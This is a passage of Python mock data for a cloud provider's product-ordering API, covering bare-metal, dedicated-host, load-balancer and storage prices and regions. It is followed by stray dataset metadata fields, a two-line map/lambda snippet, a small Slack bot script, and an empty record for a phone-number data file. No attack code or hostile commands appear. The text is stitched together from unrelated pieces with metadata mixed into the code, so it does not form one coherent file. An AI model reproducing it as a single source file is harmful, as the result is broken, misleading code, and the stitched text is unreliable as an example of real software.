'accountRestrictedActivePresets': [activePreset2], 'description': 'Bare Metal Server', 'firstOrderStepId': 1, 'id': 200, 'isActive': 1, 'items': HARDWARE_ITEMS, 'name': 'Bare Metal Server', 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 'sortOrder': 10}], 'subDescription': 'Bare Metal Server', 'unitSize': 1, "itemPrices": [ { "hourlyRecurringFee": ".027", "id": 205911, "laborFee": "0", "locationGroupId": 505, "capacityRestrictionMaximum": "40", "capacityRestrictionMinimum": "40", "capacityRestrictionType": "CORE", "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }, { "hourlyRecurringFee": "0", "id": 199467, "laborFee": "0", "locationGroupId": '', "recurringFee": "0", "item": { "capacity": "0", "description": "Load Balancer Bandwidth", "id": 10051, "keyName": "LOAD_BALANCER_BANDWIDTH", } }, { "hourlyRecurringFee": ".028", "id": 205913, "laborFee": "0", "locationGroupId": 507, "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }] }] getItems = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 
1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], }, { 'id': 1240, 'keyName': 'KeyName014', 'capacity': '4', 'units': 'PRIVATE_CORE', 'description': 'Computing Instance (Dedicated)', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1007, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 1250, 'keyName': 'KeyName015', 'capacity': '4', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1144, 'locationGroupId': None, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 112233, 'keyName': 'KeyName016', 'capacity': '55', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 332211, 'locationGroupId': 1, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 4439, 'keyName': 'KeyName017', 'capacity': '1', 'description': '1 GB iSCSI Storage', 'itemCategory': {'categoryCode': 'iscsi'}, 'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 1121, 'keyName': 'KeyName081', 'capacity': '20', 'description': '20 GB iSCSI snapshot', 'itemCategory': {'categoryCode': 'iscsi_snapshot_space'}, 'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}], }, { 'id': 4440, 'keyName': 'KeyName019', 'capacity': '4', 'description': '4 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 
8880, 'keyName': 'KeyName0199', 'capacity': '8', 'description': '8 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 44400, 'keyName': 'KeyName0155', 'capacity': '4', 'description': '4 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 88800, 'keyName': 'KeyName0144', 'capacity': '8', 'description': '8 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 10, 'keyName': 'KeyName0341', 'capacity': '0', 'description': 'Global IPv4', 'itemCategory': {'categoryCode': 'global_ipv4'}, 'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 66464, 'keyName': '1_IPV6_ADDRESS', 'capacity': '64', 'description': '/64 Block Portable Public IPv6 Addresses', 'itemCategory': {'categoryCode': 'static_ipv6_addresses'}, 'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}], }, { 'id': 610, 'keyName': 'KeyName031', 'capacity': '0', 'description': 'Global IPv6', 'itemCategory': {'categoryCode': 'global_ipv6'}, 'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0.10', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0.1', 'setupFee': '0.1', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}} ] getItemPricesISCSI = [ { 'currentPriceFlag': '', 'id': 2152, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{'id': 46626, 'itemPriceId': 2152, 'packageId': 0}], 'quantity': '', 'recurringFee': '.35', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22501, 'item': {'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{ 'id': 252983, 'itemPriceId': 22501, 'packageId': 0 }], 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22441, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547 }, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': 
[{'id': 250326, 'itemPriceId': 22441, 'packageId': 0}], 'quantity': '', 'recurringFee': '15', 'setupFee': '0', 'sort': 0 }] getItemsVS = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], } ] verifyOrderDH = { 'preTaxSetup': '0', 'storageGroups': [], 'postTaxRecurring': '3.164', 'billingOrderItemId': '', 'presetId': '', 'hardware': [ { 'domain': 't.com', 'hostname': 't', 'bareMetalInstanceFlag': '', 'hardwareStatusId': '', 'primaryBackendNetworkComponent': { 'router': { 'id': 51218 }, 'networkVlanId': '' }, 'accountId': '' } ], 'prices': [ { 'itemId': 10195, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '3.164', 'oneTimeFee': '0', 'id': 200269, 'item': { 'thirdPartyPolicyAssignments': [], 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'bundle': [ { 'category': { 'categoryCode': 'dedicated_host_ram', 'id': 850, 'name': 'Dedicated Host RAM' }, 'itemPriceId': 200301, 'itemPrice': { 'itemId': 10199, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 
200301, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41763 }, { 'category': { 'categoryCode': 'dedicated_host_disk', 'id': 851, 'name': 'Dedicated Host Disk' }, 'itemPriceId': 200299, 'itemPrice': { 'itemId': 10197, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 200299, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41761 } ], 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'units': 'CORE', 'id': 10195 }, 'laborFee': '0', 'categories': [ { 'categoryCode': 'dedicated_virtual_hosts', 'id': 848, 'name': 'Dedicated Host' } ] } ], 'sendQuoteEmailFlag': '', 'packageId': 813, 'useHourlyPricing': True, 'preTaxRecurringMonthly': '0', 'message': '', 'preTaxRecurring': '3.164', 'primaryDiskPartitionId': '', 'locationObject': { 'id': 138124, 'name': 'dal05', 'longName': 'Dallas 5' }, 'taxCompletedFlag': False, 'isManagedOrder': '', 'imageTemplateId': '', 'postTaxRecurringMonthly': '0', 'resourceGroupTemplateId': '', 'postTaxSetup': '0', 'sshKeys': [], 'location': '138124', 'stepId': '', 'proratedInitialCharge': '0', 'totalRecurringTax': '0', 'paymentType': '', 'resourceGroupId': '', 'sourceVirtualGuestId': '', 'bigDataOrderFlag': False, 'extendedHardwareTesting': '', 'preTaxRecurringHourly': '3.164', 'postTaxRecurringHourly': '3.164', 'currencyShortName': 'USD', 'containerSplHash': '000000003699c54000007f38ef8b0102', 'proratedOrderTotal': '0', 'serverCoreCount': '', 'privateCloudOrderFlag': False, 'totalSetupTax': '0', 'quantity': 1 } itemsLoadbal = [ { "capacity": "0", "description": "Load Balancer as a Service", "id": 10043, "keyName": "LOAD_BALANCER_AS_A_SERVICE", "itemCategory": { "categoryCode": "load_balancer_as_a_service", 
"id": 1116, "name": "Load Balancer As A Service", }, "prices": [ { "hourlyRecurringFee": "0", "id": 199447, "locationGroupId": '', "recurringFee": "0", } ] }, { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", "itemCategory": { "categoryCode": "load_balancer_uptime", "id": 1119, "name": "Load Balancer Uptime", }, "prices": [ { "hourlyRecurringFee": ".028", "id": 205913, "locationGroupId": 507, }]} ] regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01', "groups": [ { "description": "Location Group 4", "id": 507, "locationGroupTypeId": 82, "name": "Location Group 4", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Cross Region - EU", "id": 1303, "locationGroupTypeId": 82, "name": "eu", "locationGroupType": { "name": "PRICING" } }, { "description": "COS Regional Frankfurt", "id": 1783, "locationGroupTypeId": 82, "name": "eu-de", "locationGroupType": { "name": "PRICING" } } ] }}, 'sortOrder': 10}] getAllObjectsLoadbal = [ { "id": 805, "keyName": "LBAAS", "name": "Load Balancer As A Service (LBaaS)", "items": itemsLoadbal, "regions": regionsLoadbal } ] getAllObjectsDH = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores X 242 RAM X 1.2 TB", "bundleItems": [ { "capacity": "1200", "keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "242_GB_RAM", "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, 
"setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_242_RAM_X_1_4_TB", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getAllObjectsDHGpu = [{ "subDescription": "Dedicated Host", "name": "Dedicated Host", "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": 
"0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }], "keyName": "DEDICATED_HOST", "unitSize": "", "regions": [{ "location": { "locationPackageDetails": [{ "isAvailable": 1, "locationId": 138124, "packageId": 813 }], "location": { "statusId": 2, "priceGroups": [{ "locationGroupTypeId": 82, "description": "CDN - North America - Akamai", "locationGroupType": { "name": "PRICING" }, "securityLevelId": "", "id": 1463, "name": "NORTH-AMERICA-AKAMAI" }], "id": 138124, "name": "dal05", "longName": "Dallas 5" } }, "keyname": "DALLAS05", "description": "DAL05 - Dallas", "sortOrder": 12 }], "firstOrderStepId": "", "id": 813, "isActive": 1, "description": "Dedicated Host" }] getRegions = [{ "description": "WDC07 - Washington, DC", "keyname": "WASHINGTON07", "location": { "locationId": 2017603, "location": { "id": 2017603, "longName": "Washington 7", "name": "wdc07", "priceGroups": [ { "description": "COS Regional - US East", "id": 1305, "locationGroupTypeId": 82, "name": "us-east", "locationGroupType": { "name": "PRICING" } } ] } }, "locations": [{ "location": { "euCompliantFlag": False, "id": 2017603, "longName": "Washington 7", "name": "wdc07", "statusId": 2}, "locationPackageDetails": [{ "isAvailable": 1, "locationId": 2017603, "packageId": 46 }] }] }] getItemPrices = [ { "hourlyRecurringFee": ".093", "id": 204015, "recurringFee": "62", "categories": [ { "categoryCode": "guest_core" } ], "item": { "description": "4 x 2.0 GHz or higher Cores", "id": 859, "keyName": "GUEST_CORES_4", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2, "regions": [ { "description": "MON01 - Montreal", "keyname": "MONTREAL", "sortOrder": 94 } ] }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", 
"statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2, "regions": [ { "description": "AMS02 POP - Amsterdam", "keyname": "AMSTERDAM02", "sortOrder": 12 } ] }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".006", "id": 204663, "recurringFee": "4.1", "item": { "description": "100 GB (LOCAL)", "id": 3899, "keyName": "GUEST_DISK_100_GB_LOCAL_3", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } }, { "hourlyRecurringFee": ".217", "id": 204255, "recurringFee": "144", "item": { "description": "16 GB ", "id": 1017, "keyName": "RAM_16_GB", }, "pricingLocationGroup": { "id": 503, "locations": [ { "id": 449610, "longName": "Montreal 1", "name": "mon01", "statusId": 2 }, { "id": 449618, "longName": "Montreal 2", "name": "mon02", "statusId": 2 }, { "id": 448994, "longName": "Toronto 1", "name": "tor01", "statusId": 2 }, { "id": 350993, "longName": "Toronto 2", "name": "tor02", "statusId": 2 }, { "id": 221894, "longName": "Amsterdam 2", "name": "ams02", "statusId": 2 }, { "id": 265592, "longName": "Amsterdam 1", "name": "ams01", "statusId": 2 }, { "id": 814994, "longName": "Amsterdam 3", "name": "ams03", "statusId": 2 } ] } } ] 
getActivePresets = [ { "description": "M1.64x512x25", "id": 799, "isActive": "1", "keyName": "M1_64X512X25", "name": "M1.64x512x25", "packageId": 835 }, { "description": "M1.56x448x100", "id": 797, "isActive": "1", "keyName": "M1_56X448X100", "name": "M1.56x448x100", "packageId": 835 }, { "description": "M1.64x512x100", "id": 801, "isActive": "1", "keyName": "M1_64X512X100", "name": "M1.64x512x100", "packageId": 835 } ] getAccountRestrictedActivePresets = [] RESERVED_CAPACITY = [{"id": 1059}] getItems_RESERVED_CAPACITY = [ { 'id': 12273, 'keyName': 'B1_1X2_1_YEAR_TERM', 'description': 'B1 1x2 1 year term', 'capacity': 12, 'itemCategory': { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '.032', 'id': 217561, 'itemId': 12273, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'reserved_capacity', 'id': 2060, 'name': 'Reserved Capacity', 'quantityLimit': 20, 'sortOrder': '' } ] } ] } ] getItems_1_IPV6_ADDRESS = [ { 'id': 4097, 'keyName': '1_IPV6_ADDRESS', 'itemCategory': { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 }, 'prices': [ { 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, 'itemId': 4097, 'laborFee': '0', 'locationGroupId': '', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0, 'tierMinimumThreshold': '', 'categories': [ { 'categoryCode': 'pri_ipv6_addresses', 'id': 325, 'name': 'Primary IPv6 Addresses', 'quantityLimit': 0, 'sortOrder': 34 } ] } ] } ] getObject = { 'id': 200, 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 
'sortOrder': 10}], 'accountRestrictedActivePresets': [], 'activePresets': [ { 'description': 'AC2.8x60x25', 'id': 861, 'isActive': '1', 'keyName': 'AC2_8X60X25', 'name': 'AC2.8x60x25', 'packageId': 835 }, { 'description': 'AC2.8x60x100', 'id': 863, 'isActive': '1', 'keyName': 'AC2_8X60X100', 'name': 'AC2.8x60x100', 'packageId': 835 }], "items": [{ "capacity": "56", "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]", "bundleItems": [ { "capacity": "1200", "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)", "categories": [{ "categoryCode": "dedicated_host_disk" }] }, { "capacity": "242", "keyName": "2_GPU_P100_DEDICATED", "hardwareGenericComponentModel": { "capacity": "16", "id": 849, "hardwareComponentType": { "id": 20, "keyName": "GPU" } }, "categories": [{ "categoryCode": "dedicated_host_ram" }, { "capacity": "2", "description": "2 x 2.0 GHz or higher Cores", "keyName": "GUEST_CORES_2", "attributes": [ { "id": 8261, "attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES" } ], "itemCategory": { "categoryCode": "guest_core", "id": 80 }}] } ], "prices": [ { "itemId": 10195, "setupFee": "0", "recurringFee": "2099", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.164", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200269, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": "", "quantity": "" }, { "itemId": 10195, "setupFee": "0", "recurringFee": "2161.97", "tierMinimumThreshold": "", "hourlyRecurringFee": "3.258", "oneTimeFee": "0", "currentPriceFlag": "", "id": 200271, "sort": 0, "onSaleFlag": "", "laborFee": "0", "locationGroupId": 503, "quantity": "" } ], "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100", "id": 10195, "itemCategory": { "categoryCode": "dedicated_virtual_hosts" } }]}
true
true
f705b13cfc1cd5bcb7ec174f96d2acb2a724ac65
41
py
Python
lectures/code/mr_map.py
naskoch/python_course
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
[ "MIT" ]
4
2015-08-10T17:46:55.000Z
2020-04-18T21:09:03.000Z
lectures/code/mr_map.py
naskoch/python_course
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
[ "MIT" ]
null
null
null
lectures/code/mr_map.py
naskoch/python_course
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
[ "MIT" ]
2
2019-04-24T03:31:02.000Z
2019-05-13T07:36:06.000Z
f = lambda x: x + 1 map(f, [1, 2, 3, 4])
13.666667
20
0.439024
f = lambda x: x + 1 map(f, [1, 2, 3, 4])
true
true
f705b2b334785f83ba36f8f36add6d246c62f860
2,257
py
Python
slackbot_te/slackpi.py
wray/slack_em
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
[ "MIT" ]
null
null
null
slackbot_te/slackpi.py
wray/slack_em
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
[ "MIT" ]
null
null
null
slackbot_te/slackpi.py
wray/slack_em
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
[ "MIT" ]
null
null
null
import os import time from slackclient import SlackClient import bot_id # Instructor and student imports import wray.slacklib import joe.slacklib import chris.slacklib # constants try: AT_BOT = "<@" + bot_id.get_id() + ">" except TypeError: pass # instantiate client slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN')) def handle_command(command, channel): """ Receives commands directed at the bot and determines if they are valid commands. If so, then acts on the commands. If not, returns back what it needs for clarification. Need to determine an algorithm for student overloaded commands. """ response = wray.slacklib.handle_command(command) response += joe.slacklib.handle_command(command) response += chris.slacklib.handle_command(command) print("["+response+"]") if len(response) == 0: response = "Why thank you, I don't know what else to say." slack_client.api_call("chat.postMessage", channel=channel, text=response, as_user=True) def parse_slack_output(slack_rtm_output): """ The Slack Real Time Messaging API is an events firehose. this parsing function returns None unless a message is directed at the Bot, based on its ID. """ output_list = slack_rtm_output print(output_list) if output_list and len(output_list) > 0: for output in output_list: if output and 'text' in output and AT_BOT in output['text']: # return text after the @ mention, whitespace removed return output['text'].split(AT_BOT)[1].strip().lower(), \ output['channel'] return None, None if __name__ == "__main__": READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose if slack_client.rtm_connect(): print("StarterBot connected and running!") while True: command, channel = parse_slack_output(slack_client.rtm_read()) print(command,channel) if command and channel: handle_command(command, channel) time.sleep(READ_WEBSOCKET_DELAY) else: print("Connection failed. Invalid Slack token or bot ID?")
30.5
75
0.658839
import os import time from slackclient import SlackClient import bot_id import wray.slacklib import joe.slacklib import chris.slacklib try: AT_BOT = "<@" + bot_id.get_id() + ">" except TypeError: pass slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN')) def handle_command(command, channel): response = wray.slacklib.handle_command(command) response += joe.slacklib.handle_command(command) response += chris.slacklib.handle_command(command) print("["+response+"]") if len(response) == 0: response = "Why thank you, I don't know what else to say." slack_client.api_call("chat.postMessage", channel=channel, text=response, as_user=True) def parse_slack_output(slack_rtm_output): output_list = slack_rtm_output print(output_list) if output_list and len(output_list) > 0: for output in output_list: if output and 'text' in output and AT_BOT in output['text']: # return text after the @ mention, whitespace removed return output['text'].split(AT_BOT)[1].strip().lower(), \ output['channel'] return None, None if __name__ == "__main__": READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose if slack_client.rtm_connect(): print("StarterBot connected and running!") while True: command, channel = parse_slack_output(slack_client.rtm_read()) print(command,channel) if command and channel: handle_command(command, channel) time.sleep(READ_WEBSOCKET_DELAY) else: print("Connection failed. Invalid Slack token or bot ID?")
true
true
f705b48143f78825bb5ce93336c2b928cbc14651
2,601
py
Python
venv/Lib/site-packages/phonenumbers/data/region_PH.py
HarisHijazi/mojarnik-server
bee7266609cc0bca7cc6a4059086fc0ba7219a33
[ "MIT" ]
null
null
null
venv/Lib/site-packages/phonenumbers/data/region_PH.py
HarisHijazi/mojarnik-server
bee7266609cc0bca7cc6a4059086fc0ba7219a33
[ "MIT" ]
2
2021-06-22T01:34:18.000Z
2021-06-22T01:40:28.000Z
venv/Lib/site-packages/phonenumbers/data/region_PH.py
HarisHijazi/mojarnik-server
bee7266609cc0bca7cc6a4059086fc0ba7219a33
[ "MIT" ]
null
null
null
